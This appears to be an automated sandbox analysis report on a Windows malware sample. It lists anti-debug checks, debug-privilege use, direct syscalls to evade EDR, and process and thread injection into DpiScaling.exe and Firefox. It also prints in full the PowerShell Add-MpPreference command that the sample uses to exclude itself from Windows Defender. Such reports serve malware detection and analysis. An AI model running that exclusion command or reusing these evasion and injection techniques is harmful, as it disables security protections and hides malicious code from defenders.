Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A0096E mov eax, dword ptr fs:[00000030h]	7_2_01A0096E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A0096E mov edx, dword ptr fs:[00000030h]	7_2_01A0096E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A0096E mov eax, dword ptr fs:[00000030h]	7_2_01A0096E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4C97C mov eax, dword ptr fs:[00000030h]	7_2_01A4C97C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A64978 mov eax, dword ptr fs:[00000030h]	7_2_01A64978
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A64978 mov eax, dword ptr fs:[00000030h]	7_2_01A64978
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A40946 mov eax, dword ptr fs:[00000030h]	7_2_01A40946
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E6962 mov eax, dword ptr fs:[00000030h]	7_2_019E6962
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E6962 mov eax, dword ptr fs:[00000030h]	7_2_019E6962
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E6962 mov eax, dword ptr fs:[00000030h]	7_2_019E6962
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0887 mov eax, dword ptr fs:[00000030h]	7_2_019C0887
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4C89D mov eax, dword ptr fs:[00000030h]	7_2_01A4C89D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8A8E4 mov eax, dword ptr fs:[00000030h]	7_2_01A8A8E4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EE8C0 mov eax, dword ptr fs:[00000030h]	7_2_019EE8C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FC8F9 mov eax, dword ptr fs:[00000030h]	7_2_019FC8F9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FC8F9 mov eax, dword ptr fs:[00000030h]	7_2_019FC8F9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6483A mov eax, dword ptr fs:[00000030h]	7_2_01A6483A
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6483A mov eax, dword ptr fs:[00000030h]	7_2_01A6483A
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov eax, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov eax, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov eax, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov ecx, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov eax, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2835 mov eax, dword ptr fs:[00000030h]	7_2_019E2835
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FA830 mov eax, dword ptr fs:[00000030h]	7_2_019FA830
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4C810 mov eax, dword ptr fs:[00000030h]	7_2_01A4C810
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C4859 mov eax, dword ptr fs:[00000030h]	7_2_019C4859
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C4859 mov eax, dword ptr fs:[00000030h]	7_2_019C4859
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F0854 mov eax, dword ptr fs:[00000030h]	7_2_019F0854
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A56870 mov eax, dword ptr fs:[00000030h]	7_2_01A56870
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A56870 mov eax, dword ptr fs:[00000030h]	7_2_01A56870
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4E872 mov eax, dword ptr fs:[00000030h]	7_2_01A4E872
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4E872 mov eax, dword ptr fs:[00000030h]	7_2_01A4E872
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D2840 mov ecx, dword ptr fs:[00000030h]	7_2_019D2840
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A74BB0 mov eax, dword ptr fs:[00000030h]	7_2_01A74BB0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A74BB0 mov eax, dword ptr fs:[00000030h]	7_2_01A74BB0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0BBE mov eax, dword ptr fs:[00000030h]	7_2_019D0BBE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0BBE mov eax, dword ptr fs:[00000030h]	7_2_019D0BBE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0BCD mov eax, dword ptr fs:[00000030h]	7_2_019C0BCD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0BCD mov eax, dword ptr fs:[00000030h]	7_2_019C0BCD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0BCD mov eax, dword ptr fs:[00000030h]	7_2_019C0BCD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4CBF0 mov eax, dword ptr fs:[00000030h]	7_2_01A4CBF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E0BCB mov eax, dword ptr fs:[00000030h]	7_2_019E0BCB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E0BCB mov eax, dword ptr fs:[00000030h]	7_2_019E0BCB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E0BCB mov eax, dword ptr fs:[00000030h]	7_2_019E0BCB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EEBFC mov eax, dword ptr fs:[00000030h]	7_2_019EEBFC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	7_2_019C8BF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	7_2_019C8BF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C8BF0 mov eax, dword ptr fs:[00000030h]	7_2_019C8BF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6EBD0 mov eax, dword ptr fs:[00000030h]	7_2_01A6EBD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A88B28 mov eax, dword ptr fs:[00000030h]	7_2_01A88B28
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A88B28 mov eax, dword ptr fs:[00000030h]	7_2_01A88B28
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3EB1D mov eax, dword ptr fs:[00000030h]	7_2_01A3EB1D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EEB20 mov eax, dword ptr fs:[00000030h]	7_2_019EEB20
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EEB20 mov eax, dword ptr fs:[00000030h]	7_2_019EEB20
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A68B42 mov eax, dword ptr fs:[00000030h]	7_2_01A68B42
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BCB7E mov eax, dword ptr fs:[00000030h]	7_2_019BCB7E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A56B40 mov eax, dword ptr fs:[00000030h]	7_2_01A56B40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A56B40 mov eax, dword ptr fs:[00000030h]	7_2_01A56B40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8AB40 mov eax, dword ptr fs:[00000030h]	7_2_01A8AB40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A74B4B mov eax, dword ptr fs:[00000030h]	7_2_01A74B4B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A74B4B mov eax, dword ptr fs:[00000030h]	7_2_01A74B4B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6EB50 mov eax, dword ptr fs:[00000030h]	7_2_01A6EB50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A16AA4 mov eax, dword ptr fs:[00000030h]	7_2_01A16AA4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F8A90 mov edx, dword ptr fs:[00000030h]	7_2_019F8A90
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80 mov eax, dword ptr fs:[00000030h]	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A94A80 mov eax, dword ptr fs:[00000030h]	7_2_01A94A80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C8AA0 mov eax, dword ptr fs:[00000030h]	7_2_019C8AA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C8AA0 mov eax, dword ptr fs:[00000030h]	7_2_019C8AA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0AD0 mov eax, dword ptr fs:[00000030h]	7_2_019C0AD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F4AD0 mov eax, dword ptr fs:[00000030h]	7_2_019F4AD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F4AD0 mov eax, dword ptr fs:[00000030h]	7_2_019F4AD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A16ACC mov eax, dword ptr fs:[00000030h]	7_2_01A16ACC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A16ACC mov eax, dword ptr fs:[00000030h]	7_2_01A16ACC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A16ACC mov eax, dword ptr fs:[00000030h]	7_2_01A16ACC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FAAEE mov eax, dword ptr fs:[00000030h]	7_2_019FAAEE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FAAEE mov eax, dword ptr fs:[00000030h]	7_2_019FAAEE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCA38 mov eax, dword ptr fs:[00000030h]	7_2_019FCA38
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E4A35 mov eax, dword ptr fs:[00000030h]	7_2_019E4A35
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E4A35 mov eax, dword ptr fs:[00000030h]	7_2_019E4A35
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EEA2E mov eax, dword ptr fs:[00000030h]	7_2_019EEA2E
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4CA11 mov eax, dword ptr fs:[00000030h]	7_2_01A4CA11
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCA24 mov eax, dword ptr fs:[00000030h]	7_2_019FCA24
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0A5B mov eax, dword ptr fs:[00000030h]	7_2_019D0A5B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0A5B mov eax, dword ptr fs:[00000030h]	7_2_019D0A5B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6EA60 mov eax, dword ptr fs:[00000030h]	7_2_01A6EA60
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C6A50 mov eax, dword ptr fs:[00000030h]	7_2_019C6A50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3CA72 mov eax, dword ptr fs:[00000030h]	7_2_01A3CA72
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3CA72 mov eax, dword ptr fs:[00000030h]	7_2_01A3CA72
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCA6F mov eax, dword ptr fs:[00000030h]	7_2_019FCA6F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCA6F mov eax, dword ptr fs:[00000030h]	7_2_019FCA6F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCA6F mov eax, dword ptr fs:[00000030h]	7_2_019FCA6F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A94DAD mov eax, dword ptr fs:[00000030h]	7_2_01A94DAD
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A88DAE mov eax, dword ptr fs:[00000030h]	7_2_01A88DAE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A88DAE mov eax, dword ptr fs:[00000030h]	7_2_01A88DAE
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E8DBF mov eax, dword ptr fs:[00000030h]	7_2_019E8DBF
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E8DBF mov eax, dword ptr fs:[00000030h]	7_2_019E8DBF
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCDB1 mov ecx, dword ptr fs:[00000030h]	7_2_019FCDB1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FCDB1 mov eax, dword ptr fs:[00000030h]	7_2_019FCDB1

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Memory written: C:\Users\user\Desktop\SLq0ulC3Wf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: NULL target: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\DpiScaling.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread register set: target process: 3636

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Thread APC queued: target process: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
